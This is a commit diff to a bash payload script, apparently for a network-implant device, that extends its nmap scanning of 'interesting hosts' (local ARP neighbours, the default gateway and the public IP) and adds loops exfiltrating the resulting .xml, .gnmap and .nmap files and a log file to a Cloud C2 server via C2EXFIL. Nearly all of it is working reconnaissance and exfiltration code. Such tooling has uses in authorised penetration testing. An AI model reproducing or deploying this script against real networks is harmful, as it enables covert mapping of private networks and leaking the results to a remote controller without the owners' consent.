Added -oA option for interessting host scan again, exfil for multiple scan results (#50)

* move -oA option to standart nmap scan

moving -oA option to generate files to the scan of the whole network, not just the interessting hosts. Since e.g. .xml files are more useful for discovery scans of a whole network.

* fix

fixed borken funktion

* Update payload.sh

* adding support for multiple nmaps with -oA option 

Re-added the -oA option for interessting hosts. With differing file name.

Support for multiple nmap scans producing output files via -oA option.
pull/51/head
Random is Resistance 2021-12-15 00:11:30 +01:00 committed by GitHub
parent 245b54384d
commit 2b04952cb6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 63 additions and 61 deletions

View File

@ -423,24 +423,23 @@ function GRAB_NMAP_LOOT() {
} }
function GRAB_NMAP_INTERESTING_HOSTS_LOOT() { function GRAB_NMAP_INTERESTING_HOSTS_LOOT() {
if [ "$GRAB_NMAP_INTERESTING_HOSTS_LOOT" = "true" ]; then if [ "$GRAB_NMAP_INTERESTING_HOSTS_LOOT" = "true" ]; then
NMAP_INTERESTING_HOSTS_LOOT_FILE=$LOOT_DIR/nmap_interesting_hosts.txt NMAP_INTERESTING_HOSTS_LOOT_FILE=$LOOT_DIR/nmap_interesting_hosts.txt
### Adding -oA nmap option to scan option ### Adding -oA nmap option to scan option
NMAP_OPTIONS_INTERESTING_HOSTS="${NMAP_OPTIONS_INTERESTING_HOSTS} -oA ${LOOT_DIR}/nmap-${SCAN_COUNT}-${TODAY}" NMAP_OPTIONS_INTERESTING_HOSTS="${NMAP_OPTIONS_INTERESTING_HOSTS} -oA ${LOOT_DIR}/nmap-interesting-hosts-${SCAN_COUNT}-${TODAY}"
touch $NMAP_INTERESTING_HOSTS_LOOT_FILE touch $NMAP_INTERESTING_HOSTS_LOOT_FILE
INTERESTING_HOSTS=( $(arp-scan --localnet | egrep $INTERESTING_HOSTS_PATTERN | awk {'print $1'} | awk '{print}' ORS='\t' | sed 's/.$//') ) INTERESTING_HOSTS=( $(arp-scan --localnet | egrep $INTERESTING_HOSTS_PATTERN | awk {'print $1'} | awk '{print}' ORS='\t' | sed 's/.$//') )
INTERESTING_HOSTS+=( $(ip r | grep default | cut -d ' ' -f 3) ) INTERESTING_HOSTS+=( $(ip r | grep default | cut -d ' ' -f 3) )
if [ "$GET_EXTERNAL_IP_ADDRESS" = "true" ]; then if [ "$GET_EXTERNAL_IP_ADDRESS" = "true" ]; then
INTERESTING_HOSTS+=( $(curl -s $PUBLIC_IP_URL) ) INTERESTING_HOSTS+=( $(curl -s $PUBLIC_IP_URL) )
fi fi
echo "****************************************************************************************************" >> $NMAP_INTERESTING_HOSTS_LOOT_FILE echo "****************************************************************************************************" >> $NMAP_INTERESTING_HOSTS_LOOT_FILE
echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\"" >> $NMAP_INTERESTING_HOSTS_LOOT_FILE echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\"" >> $NMAP_INTERESTING_HOSTS_LOOT_FILE
echo "****************************************************************************************************" >> $NMAP_INTERESTING_HOSTS_LOOT_FILE echo "****************************************************************************************************" >> $NMAP_INTERESTING_HOSTS_LOOT_FILE
echo >> $NMAP_INTERESTING_HOSTS_LOOT_FILE echo >> $NMAP_INTERESTING_HOSTS_LOOT_FILE
#nmap $NMAP_OPTIONS_INTERESTING_HOSTS ${INTERESTING_HOSTS[@]} -oN $NMAP_INTERESTING_HOSTS_LOOT_FILE && echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" executed succesfully" >> $LOG_FILE || echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" failed" >> $LOG_FILE #nmap $NMAP_OPTIONS_INTERESTING_HOSTS ${INTERESTING_HOSTS[@]} -oN $NMAP_INTERESTING_HOSTS_LOOT_FILE && echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" executed succesfully" >> $LOG_FILE || echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" failed" >> $LOG_FILE
nmap $NMAP_OPTIONS_INTERESTING_HOSTS ${INTERESTING_HOSTS[@]} >> $NMAP_INTERESTING_HOSTS_LOOT_FILE && echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" executed succesfully" >> $LOG_FILE || echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" failed" >> $LOG_FILE nmap $NMAP_OPTIONS_INTERESTING_HOSTS ${INTERESTING_HOSTS[@]} >> $NMAP_INTERESTING_HOSTS_LOOT_FILE && echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" executed succesfully" >> $LOG_FILE || echo "Nmap scan ${#INTERESTING_HOSTS[@]} interesting host with nmap options: \"$NMAP_OPTIONS_INTERESTING_HOSTS\" failed" >> $LOG_FILE
fi fi
return
} }
function GRAB_DIG_LOOT() { function GRAB_DIG_LOOT() {
@ -474,49 +473,52 @@ function GRAB_DIG_LOOT() {
# **************************************************************************************************** # ****************************************************************************************************
function EXFIL_TO_CLOUD_C2() { function EXFIL_TO_CLOUD_C2() {
if [ "$EXFIL_TO_CLOUD_C2" = "true" ]; then if [ "$EXFIL_TO_CLOUD_C2" = "true" ]; then
if [[ $(pgrep cc-client) ]]; then if [[ $(pgrep cc-client) ]]; then
LOOT_FILES="$LOOT_DIR/*.txt" LOOT_FILES="$LOOT_DIR/*.txt"
for LOOT_FILE in $LOOT_FILES; do for LOOT_FILE in $LOOT_FILES; do
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/} LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
LOOT_FILE_DESC=${LOOT_FILE_DESC^^} LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
done done
### Add exfiltration of nmap -oA files
## XML
LOOT_FILES="$LOOT_DIR/*.xml"
LOOT_FILE="${LOOT_FILES}" #just one file so no loop
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
## GNMAP ### Add exfiltration of nmap -oA files
LOOT_FILES="$LOOT_DIR/*.gnmap" ## XML
LOOT_FILE="${LOOT_FILES}" #just one file so no loop LOOT_FILES="$LOOT_DIR/*.xml"
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/} for LOOT_FILE in $LOOT_FILES; do
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
LOOT_FILE_DESC=${LOOT_FILE_DESC^^} LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
done
## NMAP ## GNMAP
LOOT_FILES="$LOOT_DIR/*.nmap" LOOT_FILES="$LOOT_DIR/*.gnmap"
LOOT_FILE="${LOOT_FILES}" #just one file so no loop for LOOT_FILE in $LOOT_FILES; do
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/} LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
LOOT_FILE_DESC=${LOOT_FILE_DESC^^} LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
done
### Exfiltrate log file ## NMAP
LOG_FILE_DESC=$SCAN_COUNT-$TODAY-LOGFILE LOOT_FILES="$LOOT_DIR/*.nmap"
C2EXFIL STRING $LOG_FILE $LOG_FILE_DESC && echo "Exfiltration of $LOG_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOG_FILE to Cloud C2 has failed" >> $LOG_FILE for LOOT_FILE in $LOOT_FILES; do
else LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed, CC-CLIENT seems not to be running" >> $LOG_FILE LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
done
fi ### Exfiltrate log file
fi LOG_FILE_DESC=$SCAN_COUNT-$TODAY-LOGFILE
return C2EXFIL STRING $LOG_FILE $LOG_FILE_DESC && echo "Exfiltration of $LOG_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOG_FILE to Cloud C2 has failed" >> $LOG_FILE
else
echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed, CC-CLIENT seems not to be running" >> $LOG_FILE
fi
fi
return
} }
function EXFIL_TO_PASTEBIN() { function EXFIL_TO_PASTEBIN() {